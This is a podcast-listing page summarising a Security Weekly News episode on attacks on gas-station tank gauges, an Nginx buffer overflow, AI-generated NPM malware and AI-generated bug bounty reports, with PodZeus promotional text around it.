My Mother the Car, AI Slop, Nginx, Polyscope, Drupal, , GitHub, Aaran Leyland... - SWN #582
Get the full intelligence
Search transcripts, export clips, track mentions, and explore all topics from “My Mother the Car, AI Slop, Nginx, Polyscope, Drupal, , GitHub, Aaran Leyland... - SWN #582” inside PodZeus.
A modern car is no longer just a vehicle—it's a data-harvesting computer on wheels, and that's just one of the alarming trends explored in this week's Security Weekly News. The episode opens with a stark warning: if you expose any system online, even obscure industrial control systems like automatic tank gauges used at gas stations, you're inviting attackers—this time, Iran—into your network. These systems, often unpatched and passwordless, are now vulnerable to remote code execution, potentially leading to overfilling tanks or disabling safety alarms. The episode then dives into a cascade of critical vulnerabilities: a decades-old buffer overflow in Nginx, a critical flaw in Universal Robots' PolyScope OS, and an imminent Drupal security update that could be exploited within hours of release. But the real theme is the new era of AI-powered cyber threats—malicious NPM packages like 'Chalk' and 'Tempalette' are being weaponized with AI-generated code, spreading through developer ecosystems like a digital vampire. These 'vibe-coded' attacks, published by a group called Team PCP, are not subtle, not obfuscated, and are now open-sourced, inviting copycats to join the chaos. Meanwhile, bug bounty programs are drowning in low-quality AI-generated reports, forcing companies like Curl to suspend their programs. The takeaway? The attack surface is expanding faster than ever, and the tools to exploit it are now accessible to anyone with a GitHub account and a free AI model.
Iran accessed unsecured automatic tank gauges in U.S. gas stations via unpatched Vitor Root TLD350/TLS450+ systems, risking physical overfilling and safety failures.
A 16-year-old buffer overflow vulnerability in Nginx (since 2008) has been exploited in the wild—patch immediately to 1.30 or 1.31.
Team PCP released open-source, AI-generated malware on NPM that spreads via 'vampire worm' tactics, poisoning every package a developer maintains.
Bug bounty programs are being overwhelmed by low-quality AI-generated reports, with Curl suspending its program due to the flood of 'AI slop'.
Your car, robot, thermostat, and even your developer's laptop are now high-value attack surfaces—monitor access, credentials, and AI usage.
…and 3 more takeaways available in PodZeus
Opening: The Car, the Chaos, and the Chaos of AI
Doug White opens the episode with a mix of humor and urgency, introducing the week's topics: Iran's access to U.S. gas station tank gauges, AI-generated malware, and the growing danger of unpatched systems.
Iran Targets Unsecured Tank Gauges
“They could manipulate this to cause overfilling. So they basically say the tank is empty in order to refill. And then, you know, somebody comes and starts pumping fuel into the tank and it overflows.”
Nginx Buffer Overflow: A 16-Year-Old Vulnerability Exploited
“The vulnerability can be caused because of an address space layout randomization feature. If you have that disabled, it apparently can lead to remote code execution.”
AI-Generated Malware on NPM: The 'Vibe-Coded' Threat
“One kid. vibe coding with an NPM published token for info stealers in an afternoon. Hey, good work. Somebody should like maybe hire that person.”
Drupal’s Urgent Patch: A Domino Effect of Risk
Drupal is releasing a critical security update on May 20th—users must prepare for immediate patching, especially those on end-of-life versions.
“One kid. vibe coding with an NPM published token for info stealers in an afternoon. Hey, good work. Somebody should like maybe hire that person.”
“They could manipulate this to cause overfilling. So they basically say the tank is empty in order to refill. And then, you know, somebody comes and starts pumping fuel into the tank and it overflows.”
“Bug Crowd said their reports had quadrupled over three weeks in March with most of the reports being really low quality and false.”
Host
Guest
Nginx
product
GitHub
other
NPM
other
Drupal
product
Team PCP
other
Aaran Leyland
person
Iran
place
F5
organization
PolyScope
product
GitGuardian
organization
DexterBot, Darksword, Eviltokens, Tubular Bells, Claude, Drift, Gmail, Josh Marpet... - SWN #569
Security Weekly News (Audio) • 32m • 4/3/2026
Staypuft, Claude, One Pixel, deepfakes, Raccoon, BOFH, Satoshi Nakamoto, Josh Marpet. - SWN #571
Security Weekly News (Audio) • 30m • 4/10/2026
Zuckbot, Rockstar, Klaude, Browsers Galore, Microsoft 365, ATC, Kieran Human and more - Kieran Human - SWN #572
Security Weekly News (Audio) • 36m • 4/14/2026
Dougbot, RedSun, ATHR, Vishing, Cisco, Google, Chrome, Severance, Shor, Josh Marpet.. - SWN #573
Security Weekly News (Audio) • 33m • 4/17/2026
Robosawmill, Gentleman, Vercel, GitHub, Claude, RS232, Josh Marpet, and More... - SWN #574
Security Weekly News (Audio) • 32m • 4/21/2026
Get the full intelligence
Search transcripts, export clips, track mentions, and explore all topics from “My Mother the Car, AI Slop, Nginx, Polyscope, Drupal, , GitHub, Aaran Leyland... - SWN #582” inside PodZeus.
Start discovering podcast insights today
Start with a 7-day trial and explore a growing catalog of popular podcasts. No credit card required.
No credit card required • 7-day trial • Cancel anytime